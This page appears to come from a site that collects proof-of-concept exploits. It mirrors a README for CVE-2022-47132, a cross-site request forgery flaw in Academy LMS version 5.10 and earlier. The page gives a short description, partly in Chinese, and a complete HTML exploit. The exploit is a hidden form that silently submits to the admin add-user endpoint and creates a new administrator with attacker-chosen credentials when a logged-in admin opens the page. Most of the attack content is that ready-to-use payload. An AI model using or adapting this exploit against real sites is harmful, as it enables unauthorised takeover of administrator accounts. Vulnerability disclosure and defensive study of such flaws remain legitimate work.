Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-47132 PoC — Academy Learning Management System 跨站请求伪造漏洞

Source
Associated Vulnerability
Title:Academy Learning Management System 跨站请求伪造漏洞 (CVE-2022-47132)
Description:Academy Learning Management System是Creativeitem团队的一个学院学习管理系统。 Academy LMS v5.10之前版本存在安全漏洞,攻击者利用该漏洞可以添加管理员用户。
Description
Academy LMS <= 5.10 CSRF
Readme
# CVE-2022-47132
Academy LMS &lt;= 5.10 CSRF

# Description
Academy LMS is an application where people can create and advertise courses. The ability to add a new administrative user is vulnerable to CSRF, making it possible to use social engineering to gain admin access on the platform.

#Proof of Concept (POC)
The first step in our proof of concept is to authenticate to the platform with an administrative user.

After that, simply access the page that contains the code for exploiting the vulnerability, and see that a new administrative user has been added to the system.

Code used in the exploit:

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://target.com/academy/admin/admins/add" method="POST">
      <input type="hidden" name="first&#95;name" value="csrf" />
      <input type="hidden" name="last&#95;name" value="vinix" />
      <input type="hidden" name="biography" value="&lt;p&gt;csrf&#32;poc&lt;&#47;p&gt;" />
      <input type="hidden" name="files" value="" />
      <input type="hidden" name="user&#95;image" value="" />
      <input type="hidden" name="email" value="username" />
      <input type="hidden" name="password" value="password" />
      <input type="hidden" name="facebook&#95;link" value="" />
      <input type="hidden" name="twitter&#95;link" value="" />
      <input type="hidden" name="linkedin&#95;link" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
File Snapshot

[4.0K] /data/pocs/e2d64687e4333567dc36bbf69db1cc6f5422a503 └── [1.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.